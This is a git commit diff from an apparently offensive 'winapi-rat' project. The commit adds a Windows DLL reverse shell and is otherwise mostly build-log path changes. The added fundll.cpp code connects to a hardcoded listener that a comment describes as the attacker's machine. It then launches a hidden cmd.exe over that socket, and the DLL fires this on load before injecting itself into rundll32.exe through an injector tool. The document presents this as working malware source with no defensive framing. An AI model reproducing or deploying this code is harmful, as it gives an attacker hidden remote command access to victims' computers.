Improved some stuff, cleaned some stuff. Now after executing loader the dll creates a reverse shell to a specified server.

This commit is contained in:
hellisabove
2023-07-20 01:46:07 +03:00
parent 5a7024e1fa
commit eb9959e01e
53 changed files with 94 additions and 98 deletions
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
Binary file not shown.
BIN
View File
Binary file not shown.
-13
View File
@@ -1,13 +0,0 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\dll.lib
c:\users\hellisabove\source\repos\rat\debug\dll.exp
c:\users\hellisabove\source\repos\rat\debug\dll.dll
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
+4 -5
View File
@@ -1,10 +1,9 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
fundll.cpp fundll.cpp
tools.cpp Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
Generating code Generating code
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
Finished generating code Finished generating code
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
-2
View File
@@ -1,2 +0,0 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+16 -16
View File
@@ -1,16 +1,16 @@
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
c:\users\hellisabove\source\repos\rat\debug\fundll.lib c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
c:\users\hellisabove\source\repos\rat\debug\fundll.exp c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
c:\users\hellisabove\source\repos\rat\debug\fundll.dll c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 #TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+42 -25
View File
@@ -1,42 +1,59 @@
#include <winsock2.h>
#include <stdio.h>
#include "tools.h" #include "tools.h"
BOOL was_dllmain_called = FALSE; #pragma comment(lib, "ws2_32")
DWORD dll_param;
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe"; int reverse(void) {
WSADATA wsaData;
SOCKET wSock;
struct sockaddr_in sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
// listener ip, port on attacker's machine
char* ip = "192.168.1.240";
short port = 4444;
// init socket lib
WSAStartup(MAKEWORD(2, 2), &wsaData);
// create socket
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
sock.sin_addr.s_addr = inet_addr(ip);
// connect to remote host
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
// start cmd.exe with redirected streams
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
exit(0);
}
extern "C" __declspec(dllexport) void FunEntry() { extern "C" __declspec(dllexport) void FunEntry() {
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
DWORD dll_param;
char dll_path[MAX_PATH]; char dll_path[MAX_PATH];
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH); DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
char test[1024]; reverse();
wsprintfA(test, "%s", dll_path);
MessageBoxA(0, test, "", 0);
// inject dll
Tools::AutoInject(target_path, dll_path); Tools::AutoInject(target_path, dll_path);
} }
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) { BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
dll_param = (DWORD)Base;
was_dllmain_called = TRUE;
switch (Callback) { switch (Callback) {
case DLL_PROCESS_ATTACH: case DLL_PROCESS_ATTACH:
FunEntry();
break; case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH: case DLL_PROCESS_DETACH:
break; break;
} }
return TRUE; return TRUE;
}
extern "C" __declspec(dllexport) void MainBitch() {
if (was_dllmain_called) {
while (TRUE) {
char exe[MAX_PATH + 1];
GetModuleFileNameA(0, exe, sizeof(exe));
MessageBoxA(0, exe, "I am inside: ", 0);
}
} else {
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
}
} }
-1
View File
@@ -1,5 +1,4 @@
#include <Windows.h> #include <Windows.h>
#pragma once #pragma once
namespace Tools { namespace Tools {
+13 -13
View File
@@ -1,13 +1,13 @@
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.idb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.obj
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.ilk
c:\users\hellisabove\source\repos\rat\debug\injector.exe c:\users\hellisabove\source\repos\winapi-rat\debug\injector.exe
c:\users\hellisabove\source\repos\rat\debug\injector.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\injector.pdb
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.items.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.write.1.tlog
+1 -1
View File
@@ -2,7 +2,7 @@
<Project> <Project>
<ProjectOutputs> <ProjectOutputs>
<ProjectOutput> <ProjectOutput>
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath> <FullPath>C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe</FullPath>
</ProjectOutput> </ProjectOutput>
</ProjectOutputs> </ProjectOutputs>
<ContentFiles /> <ContentFiles />
Binary file not shown.
+1 -1
View File
@@ -1,2 +1,2 @@
injector.cpp injector.cpp
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe Injector.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -1 +1 @@
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj C:\Users\hellisabove\source\repos\winapi-rat\Injector\injector.cpp;C:\Users\hellisabove\source\repos\winapi-rat\Injector\Debug\injector.obj
@@ -1,2 +1,2 @@
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0: PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1 -1
View File
@@ -78,5 +78,5 @@ INT main(INT arg, PCHAR argv[]) {
CloseHandle(x_file); CloseHandle(x_file);
} }
else else
printf("\nUSE: %s section name target dll\n",argv[0]); printf("\nUSE: %s 'section name' target dll\n",argv[0]);
} }
+11 -11
View File
@@ -1,11 +1,11 @@
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb c:\users\hellisabove\source\repos\winapi-rat\loader\debug\vc141.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj c:\users\hellisabove\source\repos\winapi-rat\loader\debug\tools.obj
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.obj
c:\users\hellisabove\source\repos\rat\debug\loader.exe c:\users\hellisabove\source\repos\winapi-rat\debug\loader.exe
c:\users\hellisabove\source\repos\rat\debug\loader.pdb c:\users\hellisabove\source\repos\winapi-rat\debug\loader.pdb
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.write.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.command.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.read.1.tlog
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.write.1.tlog
+1 -5
View File
@@ -1,6 +1,2 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information. C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-' Loader.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Loader.exe
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0 #TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\| Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.